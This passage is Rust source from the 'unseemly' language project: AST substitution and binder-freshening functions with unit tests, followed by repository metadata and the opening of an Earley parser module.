cur_node_contents, 0) { new_env = new_env.unset(bound_name); } node.with_c(ExtendEnvPhaseless( substitute_rec(body, cur_node_contents, &new_env), beta.clone(), )) } QuoteMore(ref body, pos) => { node.with_c(QuoteMore(substitute_rec(body, cur_node_contents, &env.q_more(1)), *pos)) } QuoteLess(ref body, depth) => node.with_c(QuoteLess( substitute_rec(body, cur_node_contents, &env.q_less(*depth)), *depth, )), _ => node.clone(), } } /// Substitute `VariableReference`s in `node`, according to `env`. /// TODO: don't use this to "capture the environment"; it doesn't work in the presence of recursion /// Instead, we should introduce a "constant" to Beta. (Does `SameAs` suffice now?) 
/// TODO: because of mu's use of `VariableReference`s in a place where other `Ast`s are forbidden, /// it seems like this has limited use. /// TODO: this isn't capture-avoiding (and shouldn't be, when called by `freshen_rec`) /// It's safe to use when the RHS of the environment is just fresh names. pub fn substitute(node: &Ast, env: &Assoc<Name, Ast>) -> Ast { substitute_rec(node, &EnvMBE::new(), &Ren::from(env.clone())) } /// Like `beta::names_mentioned`, but for all the imports in `parts` fn mentioned_in_import(parts: &EnvMBE<Ast>) -> Vec<Name> { fn process_ast(a: &Ast, v: &mut Vec<Name>) { match a.c() { Node(_, _, _) => {} // new scope ExtendEnv(ref body, ref beta) | ExtendEnvPhaseless(ref body, ref beta) => { let mut beta_mentions = beta.names_mentioned_and_bound(); v.append(&mut beta_mentions); process_ast(&*body, v); } // TODO: does it make sense to mention a name underneath a quotation? QuoteMore(ref body, _) | QuoteLess(ref body, _) => process_ast(body, v), Trivial | Atom(_) | VariableReference(_) => {} // no beta Shape(_) | IncompleteNode(_) => icp!("{:?} isn't a complete AST", a), } } let mut res = vec![]; parts.map(&mut |a| process_ast(a, &mut res)); res } fn freshen_rec(node: &Ast, renamings: &EnvMBE<(Ast, Ren)>, env: Ren) -> Ast { // `env` is used to update the references to those atoms to match match node.c() { Node(_, _, _) => substitute_rec(node, &EnvMBE::new(), &env), VariableReference(n) => env.find(*n).unwrap_or(&node.clone()).clone(), ExtendEnv(ref body, ref beta) => { let new_env = env.set_assoc(&beta.extract_from_mbe(renamings, &|x: &(_, Ren)| &x.1)); node.with_c(ExtendEnv(freshen_rec(body, renamings, new_env), beta.clone())) } ExtendEnvPhaseless(ref body, ref beta) => { // Everything bound this way becomes phaseless. 
let new__env = env.set_assoc( &beta.extract_from_mbe(renamings, &|x: &(_, Ren)| &x.1).become_phaseless(), ); node.with_c(ExtendEnvPhaseless(freshen_rec(body, renamings, new__env), beta.clone())) } QuoteMore(ref body, pos) => { node.with_c(QuoteMore(freshen_rec(body, renamings, env.q_more(1)), *pos)) } QuoteLess(ref body, depth) => { node.with_c(QuoteLess(freshen_rec(body, renamings, env.q_less(*depth)), *depth)) } Atom(_) | Trivial | IncompleteNode(_) | Shape(_) => node.clone(), } } thread_local! { pub static freshening_enabled: std::cell::RefCell<bool> = std::cell::RefCell::new(true); pub static watching: Option<String> = std::env::var(&"UNSEEMLY_FRESHEN_WATCH").ok(); } pub fn freshen(a: &Ast) -> Ast { // TODO: I think this shouldn't take a reference for performance if freshening_enabled.with(|f| *f.borrow()) { a.c_map(&|c| match c { &Node(ref f, ref p, ref export) => { // Every part that gets mentioned inside this node... let mentioned = mentioned_in_import(p); // ...needs to have its binders freshend: let fresh_ast_and_rens = freshen_binders_inside_node(p, &mentioned); let freshened_node = Node( f.clone(), fresh_ast_and_rens.marched_map( &mut |_, marched: &EnvMBE<(Ast, Ren)>, &(ref part, _)| { freshen_rec(part, marched, Ren::new()) }, ), export.clone(), ); // Diagnostic output for "watching freshening". 
watching.with(|watching_name| { if let Some(name) = watching_name { let freshened_to = fresh_ast_and_rens.map_reduce( &|ast_and_ren: &(Ast, Ren)| ast_and_ren.1.find_orig(name), &|lhs: &Option<(Name, Ast)>, rhs: &Option<(Name, Ast)>| { lhs.clone().or(rhs.clone()) }, None, ); if let Some((k, new_ast)) = freshened_to { println!("🥦 Renaming {} => {}:", k, new_ast); println!("🥦 {}", freshened_node) } } }); freshened_node } non_node => non_node.clone(), }) } else { a.clone() } } // TODO: verify that this handles internal `ExtendEnv`s right pub fn freshen_with(lhs: &Ast, rhs: &Ast) -> (Ast, Ast) { if freshening_enabled.with(|f| *f.borrow()) { match (lhs.c(), rhs.c()) { (&Node(ref f, ref p_lhs, ref export), &Node(ref f_rhs, ref p_rhs, ref export_rhs)) => { if f != f_rhs || export != export_rhs { return (lhs.clone(), rhs.clone()); } // Every part that gets mentioned inside this node... let mentioned = mentioned_in_import(p_lhs); // (if it matters which `p_{l,r}hs` we used, the match below will be `None`) // ...needs to have its binders freshend: match freshen_binders_inside_node_with(p_lhs, p_rhs, &mentioned) { Some(fresh_ast_and_rens) => { let new_p_lhs = fresh_ast_and_rens.marched_map( &mut |_, marched: &EnvMBE<(Ast, Ren, Ast, Ren)>, &(ref parts, _, _, _)| { freshen_rec( parts, &marched.map(&mut |q| (q.0.clone(), q.1.clone())), Ren::new(), ) }, ); let new_p_rhs = fresh_ast_and_rens.marched_map( &mut |_, marched: &EnvMBE<(Ast, Ren, Ast, Ren)>, &(_, _, ref parts, _)| { freshen_rec( parts, &marched.map(&mut |q| (q.2.clone(), q.3.clone())), Ren::new(), ) }, ); ( lhs.with_c(Node(f.clone(), new_p_lhs, export.clone())), rhs.with_c(Node(f.clone(), new_p_rhs, export.clone())), ) } None => (lhs.clone(), rhs.clone()), // No destructuring will be performed! 
} } _ => (lhs.clone(), rhs.clone()), // No binding } } else { (lhs.clone(), rhs.clone()) // Freshening is disabled } } pub fn freshen_binders_inside_node(parts: &EnvMBE<Ast>, mentioned: &[Name]) -> EnvMBE<(Ast, Ren)> { parts.named_map(&mut |n: &Name, a: &Ast| { if mentioned.contains(n) { freshen_binders(a) } else { (a.clone(), Ren::new()) } }) } pub fn freshen_binders_inside_node_with( p_lhs: &EnvMBE<Ast>, p_rhs: &EnvMBE<Ast>, men: &[Name], ) -> Option<EnvMBE<(Ast, Ren, Ast, Ren)>> { if !p_lhs.can_map_with(p_rhs) { return None; } p_lhs .named_map_with(p_rhs, &|n: &Name, a_lhs: &Ast, a_rhs: &Ast| { if men.contains(n) { freshen_binders_with(a_lhs, a_rhs).ok_or(()) } else { Ok((a_lhs.clone(), Ren::new(), a_rhs.clone(), Ren::new())) } }) .lift_result() .ok() } /// Returns an `Ast` like `a`, but with fresh `Atom`s /// and a map to change references in the same manner pub fn freshen_binders(a: &Ast) -> (Ast, Ren) { match a.c() { Trivial | VariableReference(_) => (a.clone(), Ren::new()), Atom(old_name) => { let new_name = old_name.freshen(); ( a.with_c(Atom(new_name)), Ren::single(*old_name, raw_ast!(VariableReference(new_name))), ) } Node(ref f, ref parts, ref export) => { if export == &crate::beta::ExportBeta::Nothing { return (a.clone(), Ren::new()); // short-circuit (should this at least warn?) 
} let exported = export.names_mentioned(); // Unmentioned atoms shouldn't be touched let fresh_pairs = freshen_binders_inside_node(parts, &exported); let fresh_ast = fresh_pairs.map(&mut |&(ref a, _): &(Ast, _)| a.clone()); let renaming = export.extract_from_mbe(&fresh_pairs, &|&(_, ref r): &(_, Ren)| &r); (a.with_c(Node(f.clone(), fresh_ast, export.clone())), renaming) } IncompleteNode(_) | Shape(_) => icp!("didn't think this was needed"), QuoteMore(ref body, pos) => { let (new_a, r) = freshen_binders(body); (a.with_c(QuoteMore(new_a, *pos)), r.q_less(1)) } QuoteLess(ref body, depth) => { let (new_a, r) = freshen_binders(body); (a.with_c(QuoteLess(new_a, *depth)), r.q_more(*depth)) } ExtendEnv(ref sub, ref beta) => { // We're only looking at `Atom`s, so this is transparent let (new_sub, subst) = freshen_binders(&*sub); (a.with_c(ExtendEnv(new_sub, beta.clone())), subst) } ExtendEnvPhaseless(ref sub, ref beta) => { // We're only looking at `Atom`s, so this is transparent let (new_sub, subst) = freshen_binders(&*sub); (a.with_c(ExtendEnvPhaseless(new_sub, beta.clone())), subst.become_phaseless()) } } } /// Like `freshen_binders`, but to unite two `Ast`s with identical structure (else returns `None`). pub fn freshen_binders_with(lhs: &Ast, rhs: &Ast) -> Option<(Ast, Ren, Ast, Ren)> { match (lhs.c(), rhs.c()) { (&Trivial, &Trivial) | (&VariableReference(_), &VariableReference(_)) => { Some((lhs.clone(), Ren::new(), rhs.clone(), Ren::new())) } (&Atom(old_name_lhs), &Atom(old_name_rhs)) => { let new_name = old_name_lhs.freshen(); Some(( lhs.with_c(Atom(new_name)), Ren::single(old_name_lhs, raw_ast!(VariableReference(new_name))), rhs.with_c(Atom(new_name)), Ren::single(old_name_rhs, raw_ast!(VariableReference(new_name))), )) } // TODO: Handle matching `'[let (a,b) = ⋯]'` against the pattern `'[let ,[p], = ⋯]'` !! 
( &Node(ref f, ref parts_lhs, ref export), &Node(ref f_rhs, ref parts_rhs, ref export_rhs), ) => { if f != f_rhs || export != export_rhs { return None; } if export == &crate::beta::ExportBeta::Nothing { // short-circuit: return Some((lhs.clone(), Ren::new(), rhs.clone(), Ren::new())); } let exported = export.names_mentioned(); // Unmentioned atoms shouldn't be touched match freshen_binders_inside_node_with(parts_lhs, parts_rhs, &exported) { Some(fresh_pairs) => { let fresh_ast_lhs = fresh_pairs.map(&mut |&(ref a, _, _, _)| a.clone()); let fresh_ast_rhs = fresh_pairs.map(&mut |&(_, _, ref a, _)| a.clone()); let ren_lhs = export.extract_from_mbe(&fresh_pairs, &|t: &(_, Ren, _, _)| &t.1); let ren_rhs = export.extract_from_mbe(&fresh_pairs, &|t: &(_, _, _, Ren)| &t.3); Some(( lhs.with_c(Node(f.clone(), fresh_ast_lhs, export.clone())), ren_lhs, rhs.with_c(Node(f.clone(), fresh_ast_rhs, export.clone())), ren_rhs, )) } None => None, } } (&QuoteMore(ref body_lhs, pos), &QuoteMore(ref body_rhs, pos_rhs)) if pos == pos_rhs => { match freshen_binders_with(&*body_lhs, &*body_rhs) { Some((n_lhs, ren_lhs, n_rhs, ren_rhs)) => Some(( lhs.with_c(QuoteMore(n_lhs, pos)), ren_lhs.q_less(1), rhs.with_c(QuoteMore(n_rhs, pos)), ren_rhs.q_less(1), )), None => None, } } (&QuoteLess(ref body_lhs, depth), &QuoteLess(ref body_rhs, depth_rhs)) if depth == depth_rhs => { match freshen_binders_with(&*body_lhs, &*body_rhs) { Some((n_lhs, ren_lhs, n_rhs, ren_rhs)) => Some(( lhs.with_c(QuoteLess(n_lhs, depth)), ren_lhs.q_more(depth), rhs.with_c(QuoteLess(n_rhs, depth)), ren_rhs.q_more(depth), )), None => None, } } (&IncompleteNode(_), _) | (&Shape(_), _) => icp!("didn't think this was needed"), (&ExtendEnv(ref sub_lhs, ref beta), &ExtendEnv(ref sub_rhs, ref beta_rhs)) | ( &ExtendEnvPhaseless(ref sub_lhs, ref beta), &ExtendEnvPhaseless(ref sub_rhs, ref beta_rhs), ) => { if beta != beta_rhs { return None; } let ee = |a: Ast| -> Ast { if let ExtendEnv(_, _) = lhs.c() { a.with_c(ExtendEnv(a.clone(), 
beta.clone())) } else { a.with_c(ExtendEnvPhaseless(a.clone(), beta.clone())) } }; // We're only looking at `Atom`s, so this is transparent match freshen_binders_with(&*sub_lhs, &*sub_rhs) { Some((n_lhs, ren_lhs, n_rhs, ren_rhs)) => { Some((ee(n_lhs), ren_lhs, ee(n_rhs), ren_rhs)) } None => None, } } _ => None, // Match failure } } #[test] fn basic_substitution() { crate::name::enable_fake_freshness(true); assert_eq!( substitute( &ast!({"Expr" "apply" : "rator" => (vr "a"), "rand" => [(vr "b"), (vr "c")]}), &assoc_n!("x" => ast!((vr "y")), "buchanan" => ast!((vr "lincoln"))) ), ast!({"Expr" "apply" : "rator" => (vr "a"), "rand" => [(vr "b"), (vr "c")]}) ); assert_eq!( substitute( &ast!({"Expr" "apply" : "rator" => (vr "buchanan"), "rand" => [(vr "buchanan"), (vr "c")]}), &assoc_n!("x" => ast!((vr "y")), "buchanan" => ast!((vr "lincoln"))) ), ast!({"Expr" "apply" : "rator" => (vr "lincoln"), "rand" => [(vr "lincoln"), (vr "c")]}) ); assert_eq!( substitute( &ast!({"Expr" "lambda" : "param" => ["b", "x"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "c")]})}), &assoc_n!("a" => ast!((vr "A")), "b" => ast!((vr "B")), "c" => ast!((vr "C"))) ), ast!({"Expr" "lambda" : "param" => ["b", "x"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "A"), (vr "b"), (vr "C")]})}) ); } #[test] fn basic_binder_freshening() { crate::name::enable_fake_freshness(true); assert_eq!(freshen_binders(&ast!((vr "a"))), (ast!((vr "a")), Ren::new())); assert_eq!( freshen_binders(&ast!("a")), (ast!("a🍅"), Ren::from(assoc_n!("a" => ast!((vr "a🍅"))))) ); assert_eq!( freshen_binders(&ast!({ "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a", "b"] })), ( ast!({ "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a🍅", "b🍅"] }), Ren::from(assoc_n!("a" => ast!((vr "a🍅")), "b" => ast!((vr "b🍅")))) ) ); } #[test] fn 
basic_freshening() { crate::name::enable_fake_freshness(true); assert_eq!( freshen(&ast!({"Expr" "lambda" : "param" => ["a", "b"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "c"), (vr "d")]})})), ast!({"Expr" "lambda" : "param" => ["a🍅", "b🍅"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a🍅"), (vr "b🍅"), (vr "c"), (vr "d")]})}) ); assert_eq!( freshen(&ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" "a", "b"], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a")), (import ["p" = "scrutinee"] (vr "x"))] })), ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" "a🍅", "b🍅"], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a🍅")), (import ["p" = "scrutinee"] (vr "x"))]}) ); // Test that importing non-atoms works assert_eq!( freshen(&ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" { "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a"] }], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a"))] })), ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" { "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a🍅"] }], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a🍅"))]}) ); // TODO: test more! 
} #[test] fn basic_phaseless_freshening() { crate::name::enable_fake_freshness(true); assert_eq!( freshen(&ast!({"Expr" "lambda" : "param" => ["a"], "pparam" => ["b"], "body" => (import_phaseless [* ["pparam" : "[ignored]"]] (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (++ true (vr "a")), (++ true (vr "b"))]}))})), ast!({"Expr" "lambda" : "param" => ["a🍅"], "pparam" => ["b🍅"], "body" => (import_phaseless [* ["pparam" : "[ignored]"]] (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a🍅"), (vr "b🍅"), (++ true (vr "a")), (++ true (vr "b🍅"))]}))}) ) } #[test] fn basic_freshening_with() { crate::name::enable_fake_freshness(true); assert_eq!( freshen_with(&ast!({"Type" "Int" :}), &ast!({"Type" "Float" :})), (ast!({"Type" "Int" :}), ast!({"Type" "Float" :})) ); assert_eq!( freshen_with( &ast!({"Expr" "lambda" : "param" => ["a", "b"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "c"), (vr "d")]})}), &ast!({"Expr" "lambda" : "param" => ["j", "k"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "j"), (vr "k"), (vr "x"), (vr "x")]})}) ), ( ast!({"Expr" "lambda" : "param" => ["a🍅", "b🍅"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a🍅"), (vr "b🍅"), (vr "c"), (vr "d")]})}), ast!({"Expr" "lambda" : "param" => ["a🍅", "b🍅"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a🍅"), (vr "b🍅"), (vr "x"), (vr "x")]})}) ) ); assert_eq!( freshen_with( &ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" { "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a"] }], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a"))] }), &ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" { "Pat" "enum_pat" => [* 
["component"]] : "name" => "[ignored]", "component" => ["x"] }], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "x"))] }) ), ( ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" { "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a🍅"] }], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a🍅"))]}), ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" { "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a🍅"] }], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a🍅"))]}) ) ); // Terms that don't match are unaffected assert_eq!( freshen_with( &ast!({"Expr" "lambda" : "param" => ["a", "b"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "c"), (vr "d")]})}), &ast!({"Expr" "lambda" : "param" => ["abc"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "x"), (vr "x")]})}) ), ( ast!({"Expr" "lambda" : "param" => ["a", "b"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "c"), (vr "d")]})}), ast!({"Expr" "lambda" : "param" => ["abc"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "x"), (vr "x")]})}) ) ); } #[test] fn mu_substitution() { let trivial_mu = ast!( { "Type" "mu_type" : "param" => [(import [prot "param"] (vr "T"))], "body" => (import [* [prot "param"]] (vr "T")) }); assert_eq!(freshen(&trivial_mu), trivial_mu); assert_eq!( substitute(&trivial_mu, &assoc_n!("T" => ast!((vr "S")))), ast!( { "Type" "mu_type" : "param" => [(import [prot "param"] (vr "S"))], "body" => (import [* [prot "param"]] (vr "S")) }) ) } #[test] fn alpha_quote_more_or_less() { crate::name::enable_fake_freshness(true); assert_eq!( freshen(&ast!({"Expr" "lambda" : "param" => ["a", "b"], "body" => (import [* ["param" : "[ignored]"]] 
(++ true {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b")]}))})), ast!({"Expr" "lambda" : "param" => ["a🍅", "b🍅"], "body" => (import [* ["param" : "[ignored]"]] (++ true {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b")]}))}) ); assert_eq!( freshen(&ast!({"Expr" "lambda" : "param" => ["a", "b"], "body" => (import [* ["param" : "[ignored]"]] (++ true (-- 1 {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b")]})))})), ast!({"Expr" "lambda" : "param" => ["a🍅", "b🍅"], "body" => (import [* ["param" : "[ignored]"]] (++ true (-- 1 {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a🍅"), (vr "b🍅")]})))}) ); }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/earley.rs
src/earley.rs
#![allow(non_upper_case_globals)] // An Earley parser! // Partly based on advice from http://loup-vaillant.fr/tutorials/earley-parsing/. // Partly based on https://arxiv.org/abs/1102.2003 // (though I'll save you the trouble of reading that one: // it can be summed up as "Just add the current grammar to the Earley rules, // and everything will work out fine.") // Why Earley? // * Earley parses arbitrary CFLs, which are // - a category of languages I can comprehend, // - and closed under composition (though ambiguity can creep in) // * Earley has a pretty good error message story (TODO: check that this is true) // * Earley maxes out at O(n^3) time†, and for practical grammars tends to be linear // †technically, the reflective bit makes parsing NP-complete, but No One Will Do That. // // Also, it turns out that implementing an Earley parser goes pretty smoothly. Yay! use crate::{ ast, ast::{Ast, LocatedAst}, ast_walk::LazyWalkReses, grammar::{ FormPat::{self, *}, SynEnv, }, name::*, util::{assoc::Assoc, mbe::EnvMBE}, }; use std::{cell::RefCell, collections::HashMap, rc::Rc}; // TODO: This UniqueId stuff is great, but we could make things faster // by storing array indices instead thread_local! { static next_id: RefCell<u32> = RefCell::new(0); // TODO: instead of indexing by unique cell, we should intern `ParseContext`s // for fast (and not just pointer-based) comparison. static all_parse_contexts: RefCell<HashMap<UniqueIdRef, ParseContext>> = RefCell::new(HashMap::new()); // For parse error reporting: how far have we gotten? 
static best_token: RefCell<(usize, Rc<FormPat>, usize)> = RefCell::new((0, Rc::new(Impossible), 0)); pub static files: RefCell<codespan_reporting::files::SimpleFiles<String, String>> = RefCell::new(codespan_reporting::files::SimpleFiles::new()) } fn get_next_id() -> UniqueId { next_id.with(|id| { let res = UniqueId(*id.borrow()); *id.borrow_mut() += 1; res }) } // Specifically *not* `Clone` or `Copy` #[derive(PartialEq, Eq)] pub struct UniqueId(u32); impl std::fmt::Debug for UniqueId { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "{}", self.0) } } #[derive(PartialEq, Eq, Clone, Copy, Hash)] pub struct UniqueIdRef(u32); impl UniqueId { fn get_ref(&self) -> UniqueIdRef { UniqueIdRef(self.0) } fn is(&self, other: UniqueIdRef) -> bool { self.0 == other.0 } } impl std::fmt::Debug for UniqueIdRef { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "{}", self.0) } } // TODO: We should probably refactor to use `ParseContext` // everywhere we currently use these two things together (particularly `earley.rs`). custom_derive! { #[derive(Clone, Debug)] pub struct ParseContext { pub grammar: SynEnv, pub type_ctxt: LazyWalkReses<crate::ty::SynthTy>, pub eval_ctxt: LazyWalkReses<crate::runtime::eval::Eval> } } impl crate::runtime::reify::Reifiable for ParseContext { fn ty_name() -> Name { n("Language") } fn reify(&self) -> crate::runtime::eval::Value { crate::runtime::eval::Value::ParseContext(Box::new(self.clone())) } fn reflect(v: &crate::runtime::eval::Value) -> ParseContext { extract!((v) crate::runtime::eval::Value::ParseContext = (ref lang) => (**lang).clone()) } } impl PartialEq for ParseContext { fn eq(&self, other: &ParseContext) -> bool { self as *const ParseContext == other as *const ParseContext } } impl ParseContext { pub fn new_from_grammar(se: SynEnv) -> ParseContext { ParseContext { grammar: se, // TODO: uh, I think this is unused? 
type_ctxt: LazyWalkReses::<crate::ty::SynthTy>::new_empty(), eval_ctxt: LazyWalkReses::<crate::runtime::eval::Eval>::new_empty(), } } pub fn with_grammar(self, se: SynEnv) -> ParseContext { ParseContext { grammar: se, ..self } } } // Hey, this doesn't need to be Reifiable! pub struct Item { /// Where (in the token input stream) this rule tried to start matching start_idx: usize, /// What are we trying to match? rule: Rc<FormPat>, /// The location of the • in the rule. Most rules are very short pos: usize, /// The current grammar, so we can interperate `Call` rules, /// and environments for typing/evaluating syntax extensions pc: Rc<ParseContext>, // -- Just for error messages -- /// This rule is too commonplace to be informative in a parse error common: bool, /// What file are we in? file_id: usize, // -- Everything after this line is nonstandard, and is just here as an optimization-- /// Identity for the purposes of `wanted_by` and `local_parse` id: UniqueId, /// Can this complete things that have asked for it? /// This is mostly a convenience. done: RefCell<bool>, // Can this complete things that have asked for it? /// For simple (leaf) nodes, we just store the resulting parse right away. /// This is a convenience so that extracting the parse tree /// doesn't require trawling through the token input /// For non-leaf nodes, store the ID of the item that provides justification local_parse: RefCell<LocalParse>, /// Traditionally, when a rule is completed in Earley parsing, /// one looks to try to find all the rules that could have asked for it. /// That's expensive! But keeping back-pointers instead has a timing problem: /// we might create a new item with an advanced • (possibly one token ahead) /// before we know everything that called for the original item. /// Therefore, we make sure that all items that start in the same place /// with the same rule/grammar /// share the same set of origins via `RefCell`. /// /// This, uh, might be an excessively cocky design. 
/// But searching item lists is *hard* when your Earley parser /// has so many different kinds of rules! wanted_by: Rc<RefCell<Vec<UniqueIdRef>>>, } /// Information for parsing. It's not a parse tree, but it tells you the next step to get one. /// (Hence "local") #[derive(PartialEq, Debug, Clone)] enum LocalParse { /// ⊤; no information yet NothingYet, JustifiedByItemPlanB(UniqueIdRef), // Looking for a better parse, though... (for `Biased`) JustifiedByItem(UniqueIdRef), /// This might be more than an atom, but *only* in the rare `Anyways` case. ParsedAtom(Ast), /// ⊥; contradiction (TMI!) Ambiguous(Box<LocalParse>, Box<LocalParse>), } use self::LocalParse::*; impl PartialOrd for LocalParse { /// Establish a lattice for `LocalParse`; some parses are better than others. /// `Biased` allows one to find a "Plan B" parse that gets overwritten by "Plan A". /// But there's also `NothingYet`, for ... (TODO: only leaves and just-started nodes?) /// ... and `Ambiguous`, when we know that there are multiple justifications for a single node fn partial_cmp(&self, other: &LocalParse) -> Option<std::cmp::Ordering> { use std::cmp::Ordering::*; if self == other { return Some(Equal); } match (self, other) { (&NothingYet, _) | (_, &Ambiguous(_, _)) => Some(Less), (&Ambiguous(_, _), _) | (_, &NothingYet) => Some(Greater), (&JustifiedByItemPlanB(_), &JustifiedByItem(_)) => Some(Less), (&JustifiedByItem(_), &JustifiedByItemPlanB(_)) => Some(Greater), (&JustifiedByItem(_), &JustifiedByItem(_)) => None, // semantically, this ought to be `None`, but that would be a hard-to-debug logic error _ => icp!("Attempted to compare {:#?} and {:#?}", self, other), } } } impl Clone for Item { fn clone(&self) -> Item { Item { start_idx: self.start_idx, rule: self.rule.clone(), pos: self.pos, pc: self.pc.clone(), common: self.common, file_id: self.file_id, id: get_next_id(), done: self.done.clone(), local_parse: RefCell::new(LocalParse::NothingYet), wanted_by: self.wanted_by.clone(), } } } /// Progress 
through the state sets // TODO: this ought to produce an Option<ParseError>, not a bool! fn create_chart( rule: Rc<FormPat>, pc: ParseContext, toks: &str, file_id: usize, ) -> (UniqueId, Vec<Vec<Item>>) { let toks = toks.trim(); // HACK: tokens don't consume trailing whitespace let mut chart: Vec<Vec<Item>> = vec![]; chart.resize_with(toks.len() + 1, std::default::Default::default); let start_but_startier = get_next_id(); let start_item = Item { start_idx: 0, rule: rule, pos: 0, pc: Rc::new(pc), common: false, file_id: file_id, id: get_next_id(), done: RefCell::new(false), local_parse: RefCell::new(LocalParse::NothingYet), wanted_by: Rc::new(RefCell::new(vec![start_but_startier.get_ref()])), }; chart[0].push(start_item); for cur_tok in 0..toks.len() { walk_tt(&mut chart, &toks, cur_tok) } examine_state_set(&mut chart, &toks, toks.len()); // One last time, for nullable rules at the end (start_but_startier, chart) } /// Recognize `rule` in `grammar` (but assume no code will need to be executed) /// For testing only; doesn't set the filename properly! fn recognize(rule: &FormPat, grammar: &SynEnv, toks: &str) -> bool { let (start_but_startier, chart) = create_chart( Rc::new(rule.clone()), ParseContext::new_from_grammar(grammar.clone()), toks, 0, ); chart[chart.len() - 1].iter().any(|item| { (*item.wanted_by.borrow()).iter().any(|idr| start_but_startier.is(*idr)) && *item.done.borrow() }) } fn walk_tt(chart: &mut Vec<Vec<Item>>, toks: &str, cur_tok: usize) { examine_state_set(chart, toks, cur_tok); // log!("\n {:#?}\n->{:#?}\n", chart[*cur_tok], chart[*cur_tok + 1]); } /// Progresses a state set until it won't go any further. /// Returns the state set for the next token. 
fn examine_state_set(chart: &mut Vec<Vec<Item>>, toks: &str, cur_tok: usize) { // If nullable items are statically identified, I think there's an optimization // where we don't re-walk old items while new_items_from_state_set(chart, toks, cur_tok) {} // Until a fixpoint is reached } fn new_items_from_state_set(chart: &mut Vec<Vec<Item>>, toks: &str, cur_tok: usize) -> bool { let mut effect = false; for idx in 0..chart[cur_tok].len() { for (new_item, adv) in chart[cur_tok][idx].examine(toks, cur_tok, chart) { effect = merge_into_state_set(new_item, &mut chart[cur_tok + adv]) || effect; } } effect } // Returns whether anything happened fn merge_into_state_set(item: Item, items: &mut Vec<Item>) -> bool { for i in items.iter() { if i.similar(&item) { if i.as_good_as(&item) { return false; // no new information } log!("improved item: {:#?} vs. {:#?}\n", item, i); i.merge(&item); return true; } } log!("new item: {:#?}\n", item); items.push(item); true } impl std::fmt::Debug for Item { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!( f, "[({:?}){}({}.{}){}<{:?} - {:?}>]", self.id, self.start_idx, self.rule, self.pos, if *self.done.borrow() { "✓" } else { "…" }, self.local_parse.borrow(), self.wanted_by.borrow() ) } } impl Item { /// This is pointer equality on `rule` and `grammar` for speed. /// Also, it intentionally ignores `done`, `local_parse`, and `wanted_by`, /// because those should be merged. 
